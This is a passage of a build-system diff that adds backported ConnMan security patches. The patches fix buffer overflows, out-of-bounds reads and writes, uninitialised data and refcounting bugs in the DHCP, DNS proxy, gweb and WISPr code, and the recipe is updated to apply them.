+@@ -2361,7 +2363,7 @@ static gboolean listener_event(GIOChannel *channel, GIOCondition condition,
+ dhcp_client->status_code = status;
+ }
+ } else {
+- message_type = dhcp_get_option(&packet, DHCP_MESSAGE_TYPE);
++ message_type = dhcp_get_option(&packet, pkt_len, DHCP_MESSAGE_TYPE);
+ if (!message_type)
+ return TRUE;
+ }
+@@ -2378,7 +2380,7 @@ static gboolean listener_event(GIOChannel *channel, GIOCondition condition,
+ dhcp_client->timeout = 0;
+ dhcp_client->retry_times = 0;
+
+- option = dhcp_get_option(&packet, DHCP_SERVER_ID);
++ option = dhcp_get_option(&packet, pkt_len, DHCP_SERVER_ID);
+ dhcp_client->server_ip = get_be32(option);
+ dhcp_client->requested_ip = ntohl(packet.yiaddr);
+
+@@ -2428,9 +2430,9 @@ static gboolean listener_event(GIOChannel *channel, GIOCondition condition,
+
+ remove_timeouts(dhcp_client);
+
+- dhcp_client->lease_seconds = get_lease(&packet);
++ dhcp_client->lease_seconds = get_lease(&packet, pkt_len);
+
+- get_request(dhcp_client, &packet);
++ get_request(dhcp_client, &packet, pkt_len);
+
+ switch_listening_mode(dhcp_client, L_NONE);
+
+@@ -2438,7 +2440,7 @@ static gboolean listener_event(GIOChannel *channel, GIOCondition condition,
+ dhcp_client->assigned_ip = get_ip(packet.yiaddr);
+
+ if (dhcp_client->state == REBOOTING) {
+- option = dhcp_get_option(&packet,
++ option = dhcp_get_option(&packet, pkt_len,
+ DHCP_SERVER_ID);
+ dhcp_client->server_ip = get_be32(option);
+ }
+diff --git a/gdhcp/common.c b/gdhcp/common.c
+index 1d667d17..c8916aa8 100644
+--- a/gdhcp/common.c
++++ b/gdhcp/common.c
+@@ -73,18 +73,21 @@ GDHCPOptionType dhcp_get_code_type(uint8_t code)
+ return OPTION_UNKNOWN;
+ }
+
+-uint8_t *dhcp_get_option(struct dhcp_packet *packet, int code)
++uint8_t *dhcp_get_option(struct dhcp_packet *packet, uint16_t packet_len, int code)
+ {
+ int len, rem;
+- uint8_t *optionptr;
++ uint8_t *optionptr, *options_end;
++ size_t options_len;
+ uint8_t overload = 0;
+
+ /* option bytes: [code][len][data1][data2]..[dataLEN] */
+ optionptr = packet->options;
+ rem = sizeof(packet->options);
++ options_len = packet_len - (sizeof(*packet) - sizeof(packet->options));
++ options_end = optionptr + options_len - 1;
+
+ while (1) {
+- if (rem <= 0)
++ if ((rem <= 0) && (optionptr + OPT_CODE > options_end))
+ /* Bad packet, malformed option field */
+ return NULL;
+
+@@ -115,14 +118,25 @@ uint8_t *dhcp_get_option(struct dhcp_packet *packet, int code)
+ break;
+ }
+
++ if (optionptr + OPT_LEN > options_end) {
++ /* bad packet, would read length field from OOB */
++ return NULL;
++ }
++
+ len = 2 + optionptr[OPT_LEN];
+
+ rem -= len;
+ if (rem < 0)
+ continue; /* complain and return NULL */
+
+- if (optionptr[OPT_CODE] == code)
+- return optionptr + OPT_DATA;
++ if (optionptr[OPT_CODE] == code) {
++ if (optionptr + len > options_end) {
++ /* bad packet, option length points OOB */
++ return NULL;
++ } else {
++ return optionptr + OPT_DATA;
++ }
++ }
+
+ if (optionptr[OPT_CODE] == DHCP_OPTION_OVERLOAD)
+ overload |= optionptr[OPT_DATA];
+diff --git a/gdhcp/common.h b/gdhcp/common.h
+index 9660231c..8f63fd75 100644
+--- a/gdhcp/common.h
++++ b/gdhcp/common.h
+@@ -179,7 +179,7 @@ struct in6_pktinfo {
+ };
+ #endif
+
+-uint8_t *dhcp_get_option(struct dhcp_packet *packet, int code);
++uint8_t *dhcp_get_option(struct dhcp_packet *packet, uint16_t packet_len, int code);
+ uint8_t *dhcpv6_get_option(struct dhcpv6_packet *packet, uint16_t pkt_len,
+ int code, uint16_t *option_len, int *option_count);
+ uint8_t *dhcpv6_get_sub_option(unsigned char *option, uint16_t max_len,
+diff --git a/gdhcp/server.c b/gdhcp/server.c
+index 85405f19..52ea2a55 100644
+--- a/gdhcp/server.c
++++ b/gdhcp/server.c
+@@ -413,7 +413,7 @@ error:
+ }
+
+
+-static uint8_t check_packet_type(struct dhcp_packet *packet)
++static uint8_t check_packet_type(struct dhcp_packet *packet, uint16_t packet_len)
+ {
+ uint8_t *type;
+
+@@ -423,7 +423,7 @@ static uint8_t check_packet_type(struct dhcp_packet *packet)
+ if (packet->op != BOOTREQUEST)
+ return 0;
+
+- type = dhcp_get_option(packet, DHCP_MESSAGE_TYPE);
++ type = dhcp_get_option(packet, packet_len, DHCP_MESSAGE_TYPE);
+
+ if (!type)
+ return 0;
+@@ -651,6 +651,7 @@ static gboolean listener_event(GIOChannel *channel, GIOCondition condition,
+ struct dhcp_lease *lease;
+ uint32_t requested_nip = 0;
+ uint8_t type, *server_id_option, *request_ip_option;
++ uint16_t packet_len;
+ int re;
+
+ if (condition & (G_IO_NVAL | G_IO_ERR | G_IO_HUP)) {
+@@ -661,12 +662,13 @@ static gboolean listener_event(GIOChannel *channel, GIOCondition condition,
+ re = dhcp_recv_l3_packet(&packet, dhcp_server->listener_sockfd);
+ if (re < 0)
+ return TRUE;
++ packet_len = (uint16_t)(unsigned int)re;
+
+- type = check_packet_type(&packet);
++ type = check_packet_type(&packet, packet_len);
+ if (type == 0)
+ return TRUE;
+
+- server_id_option = dhcp_get_option(&packet, DHCP_SERVER_ID);
++ server_id_option = dhcp_get_option(&packet, packet_len, DHCP_SERVER_ID);
+ if (server_id_option) {
+ uint32_t server_nid =
+ get_unaligned((const uint32_t *) server_id_option);
+@@ -675,7 +677,7 @@ static gboolean listener_event(GIOChannel *channel, GIOCondition condition,
+ return TRUE;
+ }
+
+- request_ip_option = dhcp_get_option(&packet, DHCP_REQUESTED_IP);
++ request_ip_option = dhcp_get_option(&packet, packet_len, DHCP_REQUESTED_IP);
+ if (request_ip_option)
+ requested_nip = get_be32(request_ip_option);
+
+--
+2.17.1
diff --git a/meta/recipes-connectivity/connman/connman/CVE-2021-26676-0002.patch b/meta/recipes-connectivity/connman/connman/CVE-2021-26676-0002.patch
new file mode 100644
index 0000000000..ce909ec293
--- /dev/null
+++ b/meta/recipes-connectivity/connman/connman/CVE-2021-26676-0002.patch
@@ -0,0 +1,33 @@
+From a74524b3e3fad81b0fd1084ffdf9f2ea469cd9b1 Mon Sep 17 00:00:00 2001
+From: Colin Wee <cwee@tesla.com>
+Date: Thu, 28 Jan 2021 19:41:09 +0100
+Subject: [PATCH] gdhcp: Avoid leaking stack data via unitiialized variable
+
+Fixes: CVE-2021-26676
+
+Upstream-Status: Backport
+CVE: CVE-2021-26676
+
+Reference to upstream patch:
+https://git.kernel.org/pub/scm/network/connman/connman.git/commit/?id=a74524b3e3fad81b0fd1084ffdf9f2ea469cd9b1
+
+Signed-off-by: Catalin Enache <catalin.enache@windriver.com>
+---
+ gdhcp/client.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/gdhcp/client.c b/gdhcp/client.c
+index 6a5613e7..c7b85e58 100644
+--- a/gdhcp/client.c
++++ b/gdhcp/client.c
+@@ -2270,7 +2270,7 @@ static gboolean listener_event(GIOChannel *channel, GIOCondition condition,
+ {
+ GDHCPClient *dhcp_client = user_data;
+ struct sockaddr_in dst_addr = { 0 };
+- struct dhcp_packet packet;
++ struct dhcp_packet packet = { 0 };
+ struct dhcpv6_packet *packet6 = NULL;
+ uint8_t *message_type = NULL, *client_id = NULL, *option,
+ *server_id = NULL;
+--
+2.17.1
diff --git a/meta/recipes-connectivity/connman/connman/CVE-2021-33833.patch b/meta/recipes-connectivity/connman/connman/CVE-2021-33833.patch
new file mode 100644
index 0000000000..770948fb69
--- /dev/null
+++ b/meta/recipes-connectivity/connman/connman/CVE-2021-33833.patch
@@ -0,0 +1,72 @@
+From eceb2e8d2341c041df55a5e2f047d9a8c491463c Mon Sep 17 00:00:00 2001
+From: Valery Kashcheev <v.kascheev@omp.ru>
+Date: Mon, 7 Jun 2021 18:58:24 +0200
+Subject: dnsproxy: Check the length of buffers before memcpy
+
+Fix using a stack-based buffer overflow attack by checking the length of
+the ptr and uptr buffers.
+
+Fix debug message output.
+
+Fixes: CVE-2021-33833
+
+Upstream-Status: Backport
+https://git.kernel.org/pub/scm/network/connman/connman.git/commit/?id=eceb2e8d2341c041df55a5e2f047d9a8c491463c
+CVE: CVE-2021-33833
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+
+---
+ src/dnsproxy.c | 20 +++++++++++---------
+ 1 file changed, 11 insertions(+), 9 deletions(-)
+
+diff --git a/src/dnsproxy.c b/src/dnsproxy.c
+index de52df5a..38dbdd71 100644
+--- a/src/dnsproxy.c
++++ b/src/dnsproxy.c
+@@ -1788,17 +1788,15 @@ static char *uncompress(int16_t field_count, char *start, char *end,
+ * tmp buffer.
+ */
+
+- debug("pos %d ulen %d left %d name %s", pos, ulen,
+- (int)(uncomp_len - (uptr - uncompressed)), uptr);
+-
+- ulen = strlen(name);
+- if ((uptr + ulen + 1) > uncomp_end) {
++ ulen = strlen(name) + 1;
++ if ((uptr + ulen) > uncomp_end)
+ goto out;
+- }
+- strncpy(uptr, name, uncomp_len - (uptr - uncompressed));
++ strncpy(uptr, name, ulen);
++
++ debug("pos %d ulen %d left %d name %s", pos, ulen,
++ (int)(uncomp_end - (uptr + ulen)), uptr);
+
+ uptr += ulen;
+- *uptr++ = '\0';
+
+ ptr += pos;
+
+@@ -1841,7 +1839,7 @@ static char *uncompress(int16_t field_count, char *start, char *end,
+ } else if (dns_type == ns_t_a || dns_type == ns_t_aaaa) {
+ dlen = uptr[-2] << 8 | uptr[-1];
+
+- if (ptr + dlen > end) {
++ if ((ptr + dlen) > end || (uptr + dlen) > uncomp_end) {
+ debug("data len %d too long", dlen);
+ goto out;
+ }
+@@ -1880,6 +1878,10 @@ static char *uncompress(int16_t field_count, char *start, char *end,
+ * refresh interval, retry interval, expiration
+ * limit and minimum ttl). They are 20 bytes long.
+ */
++ if ((uptr + 20) > uncomp_end || (ptr + 20) > end) {
++ debug("soa record too long");
++ goto out;
++ }
+ memcpy(uptr, ptr, 20);
+ uptr += 20;
+ ptr += 20;
+--
+cgit 1.2.3-1.el7
+
diff --git a/meta/recipes-connectivity/connman/connman/CVE-2022-23096-7.patch b/meta/recipes-connectivity/connman/connman/CVE-2022-23096-7.patch
new file mode 100644
index 0000000000..7f27474830
--- /dev/null
+++ b/meta/recipes-connectivity/connman/connman/CVE-2022-23096-7.patch
@@ -0,0 +1,121 @@
+From e5a313736e13c90d19085e953a26256a198e4950 Mon Sep 17 00:00:00 2001
+From: Daniel Wagner <wagi@monom.org>
+Date: Tue, 25 Jan 2022 10:00:24 +0100
+Subject: dnsproxy: Validate input data before using them
+
+dnsproxy is not validating various input data. Add a bunch of checks.
+
+Fixes: CVE-2022-23097
+Fixes: CVE-2022-23096
+
+Upstream-Status: Backport
+https://git.kernel.org/pub/scm/network/connman/connman.git/commit/?id=e5a313736e13c90d19085e953a26256a198e4950
+
+CVE: CVE-2022-23096 CVE-2022-23097
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+
+---
+ src/dnsproxy.c | 31 ++++++++++++++++++++++++++-----
+ 1 file changed, 26 insertions(+), 5 deletions(-)
+
+diff --git a/src/dnsproxy.c b/src/dnsproxy.c
+index cdfafbc2..c027bcb9 100644
+--- a/src/dnsproxy.c
++++ b/src/dnsproxy.c
+@@ -1951,6 +1951,12 @@ static int forward_dns_reply(unsigned char *reply, int reply_len, int protocol,
+
+ if (offset < 0)
+ return offset;
++ if (reply_len < 0)
++ return -EINVAL;
++ if (reply_len < offset + 1)
++ return -EINVAL;
++ if ((size_t)reply_len < sizeof(struct domain_hdr))
++ return -EINVAL;
+
+ hdr = (void *)(reply + offset);
+ dns_id = reply[offset] | reply[offset + 1] << 8;
+@@ -1986,23 +1992,31 @@ static int forward_dns_reply(unsigned char *reply, int reply_len, int protocol,
+ */
+ if (req->append_domain && ntohs(hdr->qdcount) == 1) {
+ uint16_t domain_len = 0;
+- uint16_t header_len;
++ uint16_t header_len, payload_len;
+ uint16_t dns_type, dns_class;
+ uint8_t host_len, dns_type_pos;
+ char uncompressed[NS_MAXDNAME], *uptr;
+ char *ptr, *eom = (char *)reply + reply_len;
++ char *domain;
+
+ /*
+ * ptr points to the first char of the hostname.
+ * ->hostname.domain.net
+ */
+ header_len = offset + sizeof(struct domain_hdr);
++ if (reply_len < header_len)
++ return -EINVAL;
++ payload_len = reply_len - header_len;
++
+ ptr = (char *)reply + header_len;
+
+ host_len = *ptr;
++ domain = ptr + 1 + host_len;
++ if (domain > eom)
++ return -EINVAL;
++
+ if (host_len > 0)
+- domain_len = strnlen(ptr + 1 + host_len,
+- reply_len - header_len);
++ domain_len = strnlen(domain, eom - domain);
+
+ /*
+ * If the query type is anything other than A or AAAA,
+@@ -2011,6 +2025,8 @@ static int forward_dns_reply(unsigned char *reply, int reply_len, int protocol,
+ */
+ dns_type_pos = host_len + 1 + domain_len + 1;
+
++ if (ptr + (dns_type_pos + 3) > eom)
++ return -EINVAL;
+ dns_type = ptr[dns_type_pos] << 8 |
+ ptr[dns_type_pos + 1];
+ dns_class = ptr[dns_type_pos + 2] << 8 |
+@@ -2040,6 +2056,8 @@ static int forward_dns_reply(unsigned char *reply, int reply_len, int protocol,
+ int new_len, fixed_len;
+ char *answers;
+
++ if (len > payload_len)
++ return -EINVAL;
+ /*
+ * First copy host (without domain name) into
+ * tmp buffer.
+@@ -2054,6 +2072,8 @@ static int forward_dns_reply(unsigned char *reply, int reply_len, int protocol,
+ * Copy type and class fields of the question.
+ */
+ ptr += len + domain_len + 1;
++ if (ptr + NS_QFIXEDSZ > eom)
++ return -EINVAL;
+ memcpy(uptr, ptr, NS_QFIXEDSZ);
+
+ /*
+@@ -2063,6 +2083,8 @@ static int forward_dns_reply(unsigned char *reply, int reply_len, int protocol,
+ uptr += NS_QFIXEDSZ;
+ answers = uptr;
+ fixed_len = answers - uncompressed;
++ if (ptr + offset > eom)
++ return -EINVAL;
+
+ /*
+ * We then uncompress the result to buffer
+@@ -2257,8 +2279,7 @@ static gboolean udp_server_event(GIOChannel *channel, GIOCondition condition,
+
+ len = recv(sk, buf, sizeof(buf), 0);
+
+- if (len >= 12)
+- forward_dns_reply(buf, len, IPPROTO_UDP, data);
++ forward_dns_reply(buf, len, IPPROTO_UDP, data);
+
+ return TRUE;
+ }
+--
+cgit 1.2.3-1.el7
+
diff --git a/meta/recipes-connectivity/connman/connman/CVE-2022-23098.patch b/meta/recipes-connectivity/connman/connman/CVE-2022-23098.patch
new file mode 100644
index 0000000000..a40c9f583f
--- /dev/null
+++ b/meta/recipes-connectivity/connman/connman/CVE-2022-23098.patch
@@ -0,0 +1,50 @@
+From d8708b85c1e8fe25af7803e8a20cf20e7201d8a4 Mon Sep 17 00:00:00 2001
+From: Matthias Gerstner <mgerstner@suse.de>
+Date: Tue, 25 Jan 2022 10:00:25 +0100
+Subject: dnsproxy: Avoid 100 % busy loop in TCP server case
+
+Once the TCP socket is connected and until the remote server is
+responding (if ever) ConnMan executes a 100 % CPU loop, since
+the connected socket will always be writable (G_IO_OUT).
+
+To fix this, modify the watch after the connection is established to
+remove the G_IO_OUT from the callback conditions.
+
+Fixes: CVE-2022-23098
+
+Upstream-Status: Backport
+https://git.kernel.org/pub/scm/network/connman/connman.git/commit/?id=d8708b85c1e8fe25af7803e8a20cf20e7201d8a4
+
+CVE: CVE-2022-23098
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+
+---
+ src/dnsproxy.c | 12 ++++++++++++
+ 1 file changed, 12 insertions(+)
+
+diff --git a/src/dnsproxy.c b/src/dnsproxy.c
+index c027bcb9..1ccf36a9 100644
+--- a/src/dnsproxy.c
++++ b/src/dnsproxy.c
+@@ -2360,6 +2360,18 @@ hangup:
+ }
+ }
+
++ /*
++ * Remove the G_IO_OUT flag from the watch, otherwise we end
++ * up in a busy loop, because the socket is constantly writable.
++ *
++ * There seems to be no better way in g_io to do that than
++ * re-adding the watch.
++ */
++ g_source_remove(server->watch);
++ server->watch = g_io_add_watch(server->channel,
++ G_IO_IN | G_IO_HUP | G_IO_NVAL | G_IO_ERR,
++ tcp_server_event, server);
++
+ server->connected = true;
+ server_list = g_slist_append(server_list, server);
+
+--
+cgit 1.2.3-1.el7
+
diff --git a/meta/recipes-connectivity/connman/connman/CVE-2022-32292.patch b/meta/recipes-connectivity/connman/connman/CVE-2022-32292.patch
new file mode 100644
index 0000000000..74a739d6a2
--- /dev/null
+++ b/meta/recipes-connectivity/connman/connman/CVE-2022-32292.patch
@@ -0,0 +1,37 @@
+From d1a5ede5d255bde8ef707f8441b997563b9312bd Mon Sep 17 00:00:00 2001
+From: Nathan Crandall <ncrandall@tesla.com>
+Date: Tue, 12 Jul 2022 08:56:34 +0200
+Subject: gweb: Fix OOB write in received_data()
+
+There is a mismatch of handling binary vs. C-string data with memchr
+and strlen, resulting in pos, count, and bytes_read to become out of
+sync and result in a heap overflow. Instead, do not treat the buffer
+as an ASCII C-string. We calculate the count based on the return value
+of memchr, instead of strlen.
+
+Fixes: CVE-2022-32292
+
+Upstream-Status: Backport
+https://git.kernel.org/pub/scm/network/connman/connman.git/commit/?id=d1a5ede5d255bde8ef707f8441b997563b9312b
+CVE: CVE-2022-32292
+Signed-off-by: Lee Chee Yang <chee.yang.lee@intel.com>
+---
+ gweb/gweb.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/gweb/gweb.c b/gweb/gweb.c
+index 12fcb1d8..13c6c5f2 100644
+--- a/gweb/gweb.c
++++ b/gweb/gweb.c
+@@ -918,7 +918,7 @@ static gboolean received_data(GIOChannel *channel, GIOCondition cond,
+ }
+
+ *pos = '\0';
+- count = strlen((char *) ptr);
++ count = pos - ptr;
+ if (count > 0 && ptr[count - 1] == '\r') {
+ ptr[--count] = '\0';
+ bytes_read--;
+--
+cgit
+
diff --git a/meta/recipes-connectivity/connman/connman/CVE-2022-32293.patch b/meta/recipes-connectivity/connman/connman/CVE-2022-32293.patch
new file mode 100644
index 0000000000..83a013981c
--- /dev/null
+++ b/meta/recipes-connectivity/connman/connman/CVE-2022-32293.patch
@@ -0,0 +1,266 @@
+From 358a44b1442fae0f82846e10da0708b5c4e1ce27 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Tue, 20 Sep 2022 17:58:19 +0530
+Subject: [PATCH] CVE-2022-32293
+
+CVE: CVE-2022-32293
+Upstream-Status: Backport [https://git.kernel.org/pub/scm/network/connman/connman.git/commit/?id=72343929836de80727a27d6744c869dff045757c && https://git.kernel.org/pub/scm/network/connman/connman.git/commit/src/wispr.c?id=416bfaff988882c553c672e5bfc2d4f648d29e8a]
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ src/wispr.c | 83 ++++++++++++++++++++++++++++++++++++++++-------------
+ 1 file changed, 63 insertions(+), 20 deletions(-)
+
+diff --git a/src/wispr.c b/src/wispr.c
+index 473c0e0..97e0242 100644
+--- a/src/wispr.c
++++ b/src/wispr.c
+@@ -59,6 +59,7 @@ struct wispr_route {
+ };
+
+ struct connman_wispr_portal_context {
++ int refcount;
+ struct connman_service *service;
+ enum connman_ipconfig_type type;
+ struct connman_wispr_portal *wispr_portal;
+@@ -96,10 +97,13 @@ static bool wispr_portal_web_result(GWebResult *result, gpointer user_data);
+
+ static GHashTable *wispr_portal_list = NULL;
+
++#define wispr_portal_context_ref(wp_context) \
++ wispr_portal_context_ref_debug(wp_context, __FILE__, __LINE__, __func__)
++#define wispr_portal_context_unref(wp_context) \
++ wispr_portal_context_unref_debug(wp_context, __FILE__, __LINE__, __func__)
++
+ static void connman_wispr_message_init(struct connman_wispr_message *msg)
+ {
+- DBG("");
+-
+ msg->has_error = false;
+ msg->current_element = NULL;
+
+@@ -159,11 +163,6 @@ static void free_wispr_routes(struct connman_wispr_portal_context *wp_context)
+ static void free_connman_wispr_portal_context(
+ struct connman_wispr_portal_context *wp_context)
+ {
+- DBG("context %p", wp_context);
+-
+- if (!wp_context)
+- return;
+-
+ if (wp_context->wispr_portal) {
+ if (wp_context->wispr_portal->ipv4_context == wp_context)
+ wp_context->wispr_portal->ipv4_context = NULL;
+@@ -200,9 +199,38 @@ static void free_connman_wispr_portal_context(
+ g_free(wp_context);
+ }
+
++static struct connman_wispr_portal_context *
++wispr_portal_context_ref_debug(struct connman_wispr_portal_context *wp_context,
++ const char *file, int line, const char *caller)
++{
++ DBG("%p ref %d by %s:%d:%s()", wp_context,
++ wp_context->refcount + 1, file, line, caller);
++
++ __sync_fetch_and_add(&wp_context->refcount, 1);
++
++ return wp_context;
++}
++
++static void wispr_portal_context_unref_debug(
++ struct connman_wispr_portal_context *wp_context,
++ const char *file, int line, const char *caller)
++{
++ if (!wp_context)
++ return;
++
++ DBG("%p ref %d by %s:%d:%s()", wp_context,
++ wp_context->refcount - 1, file, line, caller);
++
++ if (__sync_fetch_and_sub(&wp_context->refcount, 1) != 1)
++ return;
++
++ free_connman_wispr_portal_context(wp_context);
++}
++
+ static struct connman_wispr_portal_context *create_wispr_portal_context(void)
+ {
+- return g_try_new0(struct connman_wispr_portal_context, 1);
++ return wispr_portal_context_ref(
++ g_new0(struct connman_wispr_portal_context, 1));
+ }
+
+ static void free_connman_wispr_portal(gpointer data)
+@@ -214,8 +242,8 @@ static void free_connman_wispr_portal(gpointer data)
+ if (!wispr_portal)
+ return;
+
+- free_connman_wispr_portal_context(wispr_portal->ipv4_context);
+- free_connman_wispr_portal_context(wispr_portal->ipv6_context);
++ wispr_portal_context_unref(wispr_portal->ipv4_context);
++ wispr_portal_context_unref(wispr_portal->ipv6_context);
+
+ g_free(wispr_portal);
+ }
+@@ -450,8 +478,6 @@ static void portal_manage_status(GWebResult *result,
+ &str))
+ connman_info("Client-Timezone: %s", str);
+
+- free_connman_wispr_portal_context(wp_context);
+-
+ __connman_service_ipconfig_indicate_state(service,
+ CONNMAN_SERVICE_STATE_ONLINE, type);
+ }
+@@ -509,14 +535,17 @@ static void wispr_portal_request_portal(
+ {
+ DBG("");
+
++ wispr_portal_context_ref(wp_context);
+ wp_context->request_id = g_web_request_get(wp_context->web,
+ wp_context->status_url,
+ wispr_portal_web_result,
+ wispr_route_request,
+ wp_context);
+
+- if (wp_context->request_id == 0)
++ if (wp_context->request_id == 0) {
+ wispr_portal_error(wp_context);
++ wispr_portal_context_unref(wp_context);
++ }
+ }
+
+ static bool wispr_input(const guint8 **data, gsize *length,
+@@ -562,13 +591,15 @@ static void wispr_portal_browser_reply_cb(struct connman_service *service,
+ return;
+
+ if (!authentication_done) {
+- wispr_portal_error(wp_context);
+ free_wispr_routes(wp_context);
++ wispr_portal_error(wp_context);
++ wispr_portal_context_unref(wp_context);
+ return;
+ }
+
+ /* Restarting the test */
+ __connman_service_wispr_start(service, wp_context->type);
++ wispr_portal_context_unref(wp_context);
+ }
+
+ static void wispr_portal_request_wispr_login(struct connman_service *service,
+@@ -592,7 +623,7 @@ static void wispr_portal_request_wispr_login(struct connman_service *service,
+ return;
+ }
+
+- free_connman_wispr_portal_context(wp_context);
++ wispr_portal_context_unref(wp_context);
+ return;
+ }
+
+@@ -644,11 +675,13 @@ static bool wispr_manage_message(GWebResult *result,
+
+ wp_context->wispr_result = CONNMAN_WISPR_RESULT_LOGIN;
+
++ wispr_portal_context_ref(wp_context);
+ if (__connman_agent_request_login_input(wp_context->service,
+ wispr_portal_request_wispr_login,
+- wp_context) != -EINPROGRESS)
++ wp_context) != -EINPROGRESS) {
+ wispr_portal_error(wp_context);
+- else
++ wispr_portal_context_unref(wp_context);
++ } else
+ return true;
+
+ break;
+@@ -697,6 +730,7 @@ static bool wispr_portal_web_result(GWebResult *result, gpointer user_data)
+ if (length > 0) {
+ g_web_parser_feed_data(wp_context->wispr_parser,
+ chunk, length);
++ wispr_portal_context_unref(wp_context);
+ return true;
+ }
+
+@@ -714,6 +748,7 @@ static bool wispr_portal_web_result(GWebResult *result, gpointer user_data)
+
+ switch (status) {
+ case 000:
++ wispr_portal_context_ref(wp_context);
+ __connman_agent_request_browser(wp_context->service,
+ wispr_portal_browser_reply_cb,
+ wp_context->status_url, wp_context);
+@@ -725,11 +760,14 @@ static bool wispr_portal_web_result(GWebResult *result, gpointer user_data)
+ if (g_web_result_get_header(result, "X-ConnMan-Status",
+ &str)) {
+ portal_manage_status(result, wp_context);
++ wispr_portal_context_unref(wp_context);
+ return false;
+- } else
++ } else {
++ wispr_portal_context_ref(wp_context);
+ __connman_agent_request_browser(wp_context->service,
+ wispr_portal_browser_reply_cb,
+ wp_context->redirect_url, wp_context);
++ }
+
+ break;
+ case 302:
+@@ -737,6 +775,7 @@ static bool wispr_portal_web_result(GWebResult *result, gpointer user_data)
+ !g_web_result_get_header(result, "Location",
+ &redirect)) {
+
++ wispr_portal_context_ref(wp_context);
+ __connman_agent_request_browser(wp_context->service,
+ wispr_portal_browser_reply_cb,
+ wp_context->status_url, wp_context);
+@@ -747,6 +786,7 @@ static bool wispr_portal_web_result(GWebResult *result, gpointer user_data)
+
+ wp_context->redirect_url = g_strdup(redirect);
+
++ wispr_portal_context_ref(wp_context);
+ wp_context->request_id = g_web_request_get(wp_context->web,
+ redirect, wispr_portal_web_result,
+ wispr_route_request, wp_context);
+@@ -763,6 +803,7 @@ static bool wispr_portal_web_result(GWebResult *result, gpointer user_data)
+
+ break;
+ case 505:
++ wispr_portal_context_ref(wp_context);
+ __connman_agent_request_browser(wp_context->service,
+ wispr_portal_browser_reply_cb,
+ wp_context->status_url, wp_context);
+@@ -775,6 +816,7 @@ static bool wispr_portal_web_result(GWebResult *result, gpointer user_data)
+ wp_context->request_id = 0;
+ done:
+ wp_context->wispr_msg.message_type = -1;
++ wispr_portal_context_unref(wp_context);
+ return false;
+ }
+
+@@ -809,6 +851,7 @@ static void proxy_callback(const char *proxy, void *user_data)
+ xml_wispr_parser_callback, wp_context);
+
+ wispr_portal_request_portal(wp_context);
++ wispr_portal_context_unref(wp_context);
+ }
+
+ static gboolean no_proxy_callback(gpointer user_data)
+@@ -903,7 +946,7 @@ static int wispr_portal_detect(struct connman_wispr_portal_context *wp_context)
+
+ if (wp_context->token == 0) {
+ err = -EINVAL;
+- free_connman_wispr_portal_context(wp_context);
++ wispr_portal_context_unref(wp_context);
+ }
+ } else if (wp_context->timeout == 0) {
+ wp_context->timeout = g_idle_add(no_proxy_callback, wp_context);
+@@ -952,7 +995,7 @@ int __connman_wispr_start(struct connman_service *service,
+
+ /* If there is already an existing context, we wipe it */
+ if (wp_context)
+- free_connman_wispr_portal_context(wp_context);
++ wispr_portal_context_unref(wp_context);
+
+ wp_context = create_wispr_portal_context();
+ if (!wp_context)
+--
+2.25.1
+
diff --git a/meta/recipes-connectivity/connman/connman/CVE-2023-28488.patch b/meta/recipes-connectivity/connman/connman/CVE-2023-28488.patch
new file mode 100644
index 0000000000..ea1601cc04
--- /dev/null
+++ b/meta/recipes-connectivity/connman/connman/CVE-2023-28488.patch
@@ -0,0 +1,54 @@
+From 99e2c16ea1cced34a5dc450d76287a1c3e762138 Mon Sep 17 00:00:00 2001
+From: Daniel Wagner <wagi@monom.org>
+Date: Tue, 11 Apr 2023 08:12:56 +0200
+Subject: gdhcp: Verify and sanitize packet length first
+
+Upstream-Status: Backport [https://git.kernel.org/pub/scm/network/connman/connman.git/patch/?id=99e2c16ea1cced34a5dc450d76287a1c3e762138]
+CVE: CVE-2023-28488
+Signed-off-by: Ashish Sharma <asharma@mvista.com>
+
+ gdhcp/client.c | 16 +++++++++-------
+ 1 file changed, 9 insertions(+), 7 deletions(-)
+
+diff --git a/gdhcp/client.c b/gdhcp/client.c
+index 7efa7e45..82017692 100644
+--- a/gdhcp/client.c
++++ b/gdhcp/client.c
+@@ -1319,9 +1319,9 @@ static bool sanity_check(struct ip_udp_dhcp_packet *packet, int bytes)
+ static int dhcp_recv_l2_packet(struct dhcp_packet *dhcp_pkt, int fd,
+ struct sockaddr_in *dst_addr)
+ {
+- int bytes;
+ struct ip_udp_dhcp_packet packet;
+ uint16_t check;
++ int bytes, tot_len;
+
+ memset(&packet, 0, sizeof(packet));
+
+@@ -1329,15 +1329,17 @@ static int dhcp_recv_l2_packet(struct dhcp_packet *dhcp_pkt, int fd,
+ if (bytes < 0)
+ return -1;
+
+- if (bytes < (int) (sizeof(packet.ip) + sizeof(packet.udp)))
+- return -1;
+-
+- if (bytes < ntohs(packet.ip.tot_len))
++ tot_len = ntohs(packet.ip.tot_len);
++ if (bytes > tot_len) {
++ /* ignore any extra garbage bytes */
++ bytes = tot_len;
++ } else if (bytes < tot_len) {
+ /* packet is bigger than sizeof(packet), we did partial read */
+ return -1;
++ }
+
+- /* ignore any extra garbage bytes */
+- bytes = ntohs(packet.ip.tot_len);
++ if (bytes < (int) (sizeof(packet.ip) + sizeof(packet.udp)))
++ return -1;
+
+ if (!sanity_check(&packet, bytes))
+ return -1;
+--
+cgit
+
diff --git a/meta/recipes-connectivity/connman/connman_1.37.bb b/meta/recipes-connectivity/connman/connman_1.37.bb
index 00852bf0d6..8062a094d3 100644
--- a/meta/recipes-connectivity/connman/connman_1.37.bb
+++ b/meta/recipes-connectivity/connman/connman_1.37.bb
@@ -6,6 +6,15 @@ SRC_URI = "${KERNELORG_MIRROR}/linux/network/${BPN}/${BP}.tar.xz \
file://0001-gweb-fix-segfault-with-musl-v1.1.21.patch \
file://connman \
file://no-version-scripts.patch \
+ file://CVE-2021-26675.patch \
+ file://CVE-2021-26676-0001.patch \
+ file://CVE-2021-26676-0002.patch \
+ file://CVE-2021-33833.patch \
+ file://CVE-2022-23096-7.patch \
+ file://CVE-2022-23098.patch \
+ file://CVE-2022-32292.patch \
+ file://CVE-2022-32293.patch \
